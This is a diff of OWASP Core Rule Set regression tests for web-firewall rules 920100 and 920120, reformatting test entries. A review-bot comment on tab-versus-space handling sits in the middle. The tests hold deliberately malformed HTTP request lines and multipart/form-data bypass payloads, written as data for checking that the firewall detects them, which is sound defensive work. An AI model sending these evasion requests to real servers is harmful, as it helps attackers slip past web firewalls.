keep-alive - User-Agent: "OWASP CRS test agent" - method: "\tGET" - port: 80 - uri: "/get" - version: HTTP/1.1 - output: - status: 400 - - test_title: 920100-13 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + 
Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: " GET" + port: 80 + uri: "/get" + version: HTTP/1.1 + output: + status: 400 + - test_id: 13 desc: Invalid HTTP Request Line (920100) - Test 2 from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: \index.html - version: HTTP\1.0 - output: - status: 400 - - test_title: 920100-14 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: \index.html + version: HTTP\1.0 + output: + status: 400 + - test_id: 14 desc: Invalid HTTP Request Line (920100) - Test 3 from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: '|GET' - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "920100" - - test_title: 920100-15 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: '|GET' + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log_contains: id "920100" + - test_id: 15 desc: Test as described in http://www.client9.com/article/five-interesting-injection-attacks/ stages: - - stage: - 
input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: '/get/demo/xss/xml/vuln.xml.php?input=&//' - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - status: 400 - - test_title: 920100-16 + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: '/get/demo/xss/xml/vuln.xml.php?input=&//' + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + status: 400 + - test_id: 16 desc: "Status Page Test - Invalid HTTP request line: URI has scheme and authority but no path" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "http://localhost" - version: "HTTP/1.1" - output: - log_contains: "id \"920100\"" + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "http://localhost" + version: "HTTP/1.1" + output: + log_contains: "id \"920100\"" diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920120.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920120.yaml index 848cebe9b..63709a82c 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920120.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920120.yaml 
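Review bot: In test 12 the old side sends `method: "\tGET"` and the new side renders as `method: " GET"`; if the converter replaced the `\t` escape with a literal tab the request is unchanged, but if it became a space the test no longer exercises a tab before the method and duplicates test 2, whose `desc` says it sends a tab but whose value also renders as `" GET"` here. Please confirm the bytes in both tests and keep the explicit `"\tGET"` escape, which survives editors and copy-paste where a raw tab does not. The rewritten tests 12–15 also keep plain-scalar forms such as `uri: \index.html`, `version: HTTP\1.0` and `dest_addr: 127.0.0.1`, inconsistent with the quoted style of tests 1–11 in the same file.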
@@ -1,966 +1,926 @@ --- meta: author: "csanders-git, azurit" - enabled: true - name: "920120.yaml" description: "Tests to trigger rule 920120" +rule_id: 920120 tests: - - test_title: 920120-1 - stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Language: "en" - Connection: "close" - Referer: "http://localhost/" - Content-Type: "multipart/form-data; boundary=--------397236876" - uri: "/" - data: | - ----------397236876 - Content-Disposition: form-data; name="fileRap"; filename="file=.txt" - Content-Type: text/plain - - 555-555-0199@example.com - ----------397236876-- - version: "HTTP/1.1" - output: - log_contains: id "920120" - - test_title: 920120-2 + - test_id: 1 + stages: + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Language: "en" + Connection: "close" + Referer: "http://localhost/" + Content-Type: "multipart/form-data; boundary=--------397236876" + uri: "/" + data: | + ----------397236876 + Content-Disposition: form-data; name="fileRap"; filename="file=.txt" + Content-Type: text/plain + + 555-555-0199@example.com + ----------397236876-- + version: "HTTP/1.1" + output: + log_contains: id "920120" + - test_id: 2 desc: Attempted multipart/form-data bypass (920120) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: gzip, deflate - Accept-Language: en-us,en;q=0.5 - Connection: keep-alive - Content-Type: multipart/form-data; 
boundary=---------------------------627652292512397580456702590 - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - Referer: http - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: /cgi-bin/fup.cgi - version: HTTP/1.1 - data: | - -----------------------------627652292512397580456702590 - Content-Disposition: form-data; name="fi=le"; filename="test" - Content-Type: text/plain + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: gzip, deflate + Accept-Language: en-us,en;q=0.5 + Connection: keep-alive + Content-Type: multipart/form-data; boundary=---------------------------627652292512397580456702590 + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + Referer: http + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: /cgi-bin/fup.cgi + version: HTTP/1.1 + data: | + -----------------------------627652292512397580456702590 + Content-Disposition: form-data; name="fi=le"; filename="test" + Content-Type: text/plain email: security@example.com - -----------------------------627652292512397580456702590 - Content-Disposition: form-data; name="note" + -----------------------------627652292512397580456702590 + Content-Disposition: form-data; name="note" - Contact info. - -----------------------------627652292512397580456702590-- - output: - log_contains: id "920120" - - test_title: 920120-3 + Contact info. 
+ -----------------------------627652292512397580456702590-- + output: + log_contains: id "920120" + - test_id: 3 desc: Invalid Request Body (920120) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Language: en-us,en;q=0.5 - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - Referer: http - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: / - version: HTTP/1.1 - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="fi;le"; filename="test" - Content-Type: application/octet-stream - - Rotem & Ayala - - -----------------------------265001916915724 - Content-Disposition: form-data; name="name" - - tt2 - -----------------------------265001916915724 - Content-Disposition: form-data; name="B1" - - Submit - -----------------------------265001916915724-- - output: - log_contains: id "920120" - - test_title: 920120-4 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Language: en-us,en;q=0.5 + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + Referer: http + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + version: HTTP/1.1 + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="fi;le"; filename="test" + Content-Type: application/octet-stream + + Rotem & Ayala + + -----------------------------265001916915724 + Content-Disposition: form-data; name="name" + + tt2 + -----------------------------265001916915724 + Content-Disposition: form-data; name="B1" + + Submit + 
-----------------------------265001916915724-- + output: + log_contains: id "920120" + - test_id: 4 desc: Attempted multipart/form-data bypass (920120). Negative test. stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="file"; filename="test" - Content-Type: application/octet-stream + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="file"; filename="test" + Content-Type: application/octet-stream helloworld -----------------------------265001916915724-- version: "HTTP/1.1" output: no_log_contains: id "920120" - - test_title: 920120-5 + - test_id: 5 desc: Attempted multipart/form-data bypass (920120). 
stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name=";zzzz"; filename="test" - Content-Type: application/octet-stream + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name=";zzzz"; filename="test" + Content-Type: application/octet-stream helloworld -----------------------------265001916915724-- version: "HTTP/1.1" output: log_contains: id "920120" - - test_title: 920120-6 + - test_id: 6 desc: Attempted multipart/form-data bypass (920120). 
stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="amp;zzz"; filename="test" - Content-Type: application/octet-stream + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="amp;zzz"; filename="test" + Content-Type: application/octet-stream helloworld -----------------------------265001916915724-- version: "HTTP/1.1" output: log_contains: id "920120" - - test_title: 920120-7 + - test_id: 7 desc: Attempted multipart/form-data bypass (920120). 
stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="mp;zzz"; filename="test" - Content-Type: application/octet-stream + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="mp;zzz"; filename="test" + Content-Type: application/octet-stream helloworld -----------------------------265001916915724-- version: "HTTP/1.1" output: log_contains: id "920120" - - test_title: 920120-8 + - test_id: 8 desc: Attempted multipart/form-data bypass (920120). 
stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="p;zzz"; filename="test" - Content-Type: application/octet-stream + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="p;zzz"; filename="test" + Content-Type: application/octet-stream helloworld -----------------------------265001916915724-- version: "HTTP/1.1" output: log_contains: id "920120" - - test_title: 920120-9 + - test_id: 9 desc: Attempted multipart/form-data bypass (920120). 
stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="Zamp;zzz"; filename="test" - Content-Type: application/octet-stream + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="Zamp;zzz"; filename="test" + Content-Type: application/octet-stream helloworld -----------------------------265001916915724-- version: "HTTP/1.1" output: log_contains: id "920120" - - test_title: 920120-10 + - test_id: 10 desc: Attempted multipart/form-data bypass (920120). 
stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="Zmp;zzz"; filename="test" - Content-Type: application/octet-stream + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="Zmp;zzz"; filename="test" + Content-Type: application/octet-stream helloworld -----------------------------265001916915724-- version: "HTTP/1.1" output: log_contains: id "920120" - - test_title: 920120-11 + - test_id: 11 desc: Attempted multipart/form-data bypass (920120). 
stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="Zp;zzz"; filename="test" - Content-Type: application/octet-stream + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="Zp;zzz"; filename="test" + Content-Type: application/octet-stream helloworld -----------------------------265001916915724-- version: "HTTP/1.1" output: log_contains: id "920120" - - test_title: 920120-12 + - test_id: 12 desc: Attempted multipart/form-data bypass (920120). 
stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="Z;zzz"; filename="test" - Content-Type: application/octet-stream + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="Z;zzz"; filename="test" + Content-Type: application/octet-stream helloworld -----------------------------265001916915724-- version: "HTTP/1.1" output: log_contains: id "920120" - - test_title: 920120-13 + - test_id: 13 desc: Attempted multipart/form-data bypass (920120). 
stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="ZZZamp;zzz"; filename="test" - Content-Type: application/octet-stream + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="ZZZamp;zzz"; filename="test" + Content-Type: application/octet-stream helloworld -----------------------------265001916915724-- version: "HTTP/1.1" output: log_contains: id "920120" - - test_title: 920120-14 + - test_id: 14 desc: Attempted multipart/form-data bypass (920120). 
stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="ZZZmp;zzz"; filename="test" - Content-Type: application/octet-stream + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="ZZZmp;zzz"; filename="test" + Content-Type: application/octet-stream helloworld -----------------------------265001916915724-- version: "HTTP/1.1" output: log_contains: id "920120" - - test_title: 920120-15 + - test_id: 15 desc: Attempted multipart/form-data bypass (920120). 
stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="ZZZp;zzz"; filename="test" - Content-Type: application/octet-stream + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="ZZZp;zzz"; filename="test" + Content-Type: application/octet-stream helloworld -----------------------------265001916915724-- version: "HTTP/1.1" output: log_contains: id "920120" - - test_title: 920120-16 + - test_id: 16 desc: Attempted multipart/form-data bypass (920120). 
stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="ZZZ;zzz"; filename="test" - Content-Type: application/octet-stream + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="ZZZ;zzz"; filename="test" + Content-Type: application/octet-stream helloworld -----------------------------265001916915724-- version: "HTTP/1.1" output: log_contains: id "920120" - - test_title: 920120-17 + - test_id: 17 desc: Attempted multipart/form-data bypass (920120). 
stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="mZ;zzz"; filename="test" - Content-Type: application/octet-stream + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="mZ;zzz"; filename="test" + Content-Type: application/octet-stream helloworld -----------------------------265001916915724-- version: "HTTP/1.1" output: log_contains: id "920120" - - test_title: 920120-18 + - test_id: 18 desc: 'Attempted multipart/form-data bypass (920120). Negative test for HTML entities in values: &[aeiouy]uml;.' 
stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="zzzäëïöüÿÄËÏÖÜŸzzz"; filename="test" - Content-Type: application/octet-stream + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="zzzäëïöüÿÄËÏÖÜŸzzz"; filename="test" + Content-Type: application/octet-stream helloworld -----------------------------265001916915724-- version: "HTTP/1.1" output: no_log_contains: id "920120" - - test_title: 920120-19 + - test_id: 19 desc: 'Attempted multipart/form-data bypass (920120). 
Negative test for HTML entities at beginning of value: &[aeiouy]uml;' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="äëïöüÿÄËÏÖÜŸzzz"; filename="test" - Content-Type: application/octet-stream + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="äëïöüÿÄËÏÖÜŸzzz"; filename="test" + Content-Type: application/octet-stream helloworld -----------------------------265001916915724-- version: "HTTP/1.1" output: no_log_contains: id "920120" - - test_title: 920120-20 + - test_id: 20 desc: 'Attempted multipart/form-data bypass (920120). Negative test for HTML entities in values: &[aeioucghjswy]circ;.' 
stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="zzzâêîôûĉĝĥĵŝŵŷÂÊÎÔÛĈĜĤĴŜŴŶzzz"; filename="test" - Content-Type: application/octet-stream + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="zzzâêîôûĉĝĥĵŝŵŷÂÊÎÔÛĈĜĤĴŜŴŶzzz"; filename="test" + Content-Type: application/octet-stream helloworld -----------------------------265001916915724-- version: "HTTP/1.1" output: no_log_contains: id "920120" - - test_title: 920120-21 + - test_id: 21 desc: 'Attempted multipart/form-data bypass (920120). 
Negative test for HTML entities at beginning of value: &[aeioucghjswy]circ;' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="âêîôûĉĝĥĵŝŵŷÂÊÎÔÛĈĜĤĴŜŴŶzzz"; filename="test" - Content-Type: application/octet-stream + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="âêîôûĉĝĥĵŝŵŷÂÊÎÔÛĈĜĤĴŜŴŶzzz"; filename="test" + Content-Type: application/octet-stream helloworld -----------------------------265001916915724-- version: "HTTP/1.1" output: no_log_contains: id "920120" - - test_title: 920120-22 + - test_id: 22 desc: 'Attempted multipart/form-data bypass (920120). Negative test for HTML entities in values: &[aeiouclnrszg]acute;.' 
